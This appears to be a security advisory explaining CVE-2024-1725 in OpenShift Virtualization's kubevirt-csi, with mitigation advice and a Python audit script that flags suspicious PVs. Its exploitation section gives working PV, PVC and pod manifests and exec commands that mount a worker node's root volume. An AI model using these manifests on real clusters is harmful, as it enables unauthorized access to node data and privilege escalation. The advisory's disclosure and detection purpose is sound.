A recently discovered security vulnerability, CVE-2024-1725, was identified in the kubevirt-csi component used in OpenShift Virtualization's Hosted Control Plane (HCP). This flaw could let authenticated attackers gain access to sensitive storage volumes, particularly the root volume of worker nodes, simply by tricking the system with a specially named Persistent Volume (PV).
This post explains the vulnerability in simple terms, dives into the exploitation process with example code, and provides essential references.
- Product: OpenShift Virtualization (primarily in Hosted Control Plane architectures)
- Scope: Anyone who can create custom Persistent Volumes (PVs) and Persistent Volume Claims (PVCs) in a project/namespace.
How the Flaw Works
The bug comes from how kubevirt-csi binds volumes. When you create a Persistent Volume (PV) whose name matches the name of a node's root volume, the system may let you read or mount that volume, even though it was never meant to be accessible from a tenant workload.
- The attacker spots a worker node named, e.g., hcp-worker-1.
- They create a PV named hcp-worker-1 (or whatever naming the backend expects for node root volumes).
Step 1: Get Worker Node Volume Names
First, list all nodes and inspect their corresponding root volume names.
```shell
kubectl get nodes
```
Below is an example manifest for a malicious PV:
```yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: hcp-worker-1
spec:
  capacity:
    storage: 100Gi
  volumeMode: Filesystem
  accessModes:
    - ReadWriteOnce
  persistentVolumeReclaimPolicy: Retain
  csi:
    driver: kubevirt-csi-driver
    volumeHandle: hcp-worker-1 # Important: matches the node root volume name
```
Now, the attacker requests a claim for that volume:
```yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: attacker-root-access
spec:
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 10Gi
  volumeName: hcp-worker-1
```
A pod mounts the PVC:
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: pv-exploit-pod
spec:
  containers:
    - name: busybox
      image: busybox
      command: [ "sh", "-c", "sleep 360" ]
      volumeMounts:
        - mountPath: "/mnt"
          name: attacker-root-access
  volumes:
    - name: attacker-root-access
      persistentVolumeClaim:
        claimName: attacker-root-access
```
Inside the pod:
```shell
kubectl exec -it pv-exploit-pod -- /bin/sh
# Now you have access to the (previously protected) node root volume data.
ls /mnt
```
Who Is Vulnerable?
- OpenShift Virtualization HCP clusters with default permissions and unpatched kubevirt-csi deployments.
Note: This attack requires the ability to create PVs and PVCs, which might be limited; however, in many multi-tenant clusters, project admins can create such objects.
- Patch immediately: Upgrade to patched versions as soon as they are available.
- Limit PV creation privileges: Restrict PV/PVC creation to trusted users.
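Alongside restricting PV creation, a cluster admin can audit existing PVs for the collision this post describes. The following script is an added example (not part of the advisory or the kubevirt-csi project) that reads the JSON shape produced by `kubectl get nodes -o json` and `kubectl get pv -o json` and flags any kubevirt-csi PV whose volumeHandle or name equals a node name; the driver string `kubevirt-csi-driver` is taken from the manifest above and assumed to be what the cluster reports.

```python
"""Audit kubevirt-csi PersistentVolumes whose volumeHandle collides with a node name."""
import json
import sys

# Driver name as used in the PV manifest in this post (assumption: the value
# the cluster reports in spec.csi.driver).
KUBEVIRT_CSI_DRIVER = "kubevirt-csi-driver"


def suspicious_pvs(nodes: dict, pvs: dict, driver: str = KUBEVIRT_CSI_DRIVER) -> list:
    """Return (pv_name, volume_handle, node_name) for every CSI PV that targets a node name."""
    node_names = {n["metadata"]["name"] for n in nodes.get("items", [])}
    findings = []
    for pv in pvs.get("items", []):
        csi = pv.get("spec", {}).get("csi") or {}
        if csi.get("driver") != driver:
            continue  # only the kubevirt-csi driver is in scope for this check
        handle = csi.get("volumeHandle", "")
        pv_name = pv["metadata"]["name"]
        # A PV is suspicious if either its handle or its own name is a node name.
        hit = handle if handle in node_names else (pv_name if pv_name in node_names else None)
        if hit:
            findings.append((pv_name, handle, hit))
    return findings


# Constructed sample data mirroring the manifests in this post (not real cluster output).
SAMPLE_NODES = {"items": [{"metadata": {"name": "hcp-worker-1"}},
                          {"metadata": {"name": "hcp-worker-2"}}]}
SAMPLE_PVS = {"items": [
    {"metadata": {"name": "hcp-worker-1"},
     "spec": {"csi": {"driver": "kubevirt-csi-driver", "volumeHandle": "hcp-worker-1"}}},
    {"metadata": {"name": "pvc-1234"},
     "spec": {"csi": {"driver": "kubevirt-csi-driver", "volumeHandle": "pvc-1234"}}},
    {"metadata": {"name": "hcp-worker-2"},
     "spec": {"hostPath": {"path": "/data"}}},  # not a CSI volume: ignored
]}


def main() -> int:
    """Usage: audit.py nodes.json pv.json (falls back to the constructed sample)."""
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f, open(sys.argv[2]) as g:
            nodes, pvs = json.load(f), json.load(g)
    else:
        nodes, pvs = SAMPLE_NODES, SAMPLE_PVS
    hits = suspicious_pvs(nodes, pvs)
    for pv_name, handle, node in hits:
        print(f"ALERT: PV {pv_name!r} (volumeHandle={handle!r}) matches node {node!r}")
    return 1 if hits else 0  # non-zero exit lets a CI or cron job fail loudly


if __name__ == "__main__":
    sys.exit(main())
```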
References
- Red Hat Security Advisory for CVE-2024-1725
- OpenShift Virtualization documentation
- KubeVirt CSI documentation
Conclusion
CVE-2024-1725 exposes a critical hole in the Hosted Control Plane architecture of OpenShift Virtualization. While this issue requires authenticated access, its impact is severe and could allow attackers to escalate privileges and compromise cluster integrity.
Timeline
Published on: 03/07/2024 20:15:50 UTC
Last modified on: 04/26/2024 20:15:07 UTC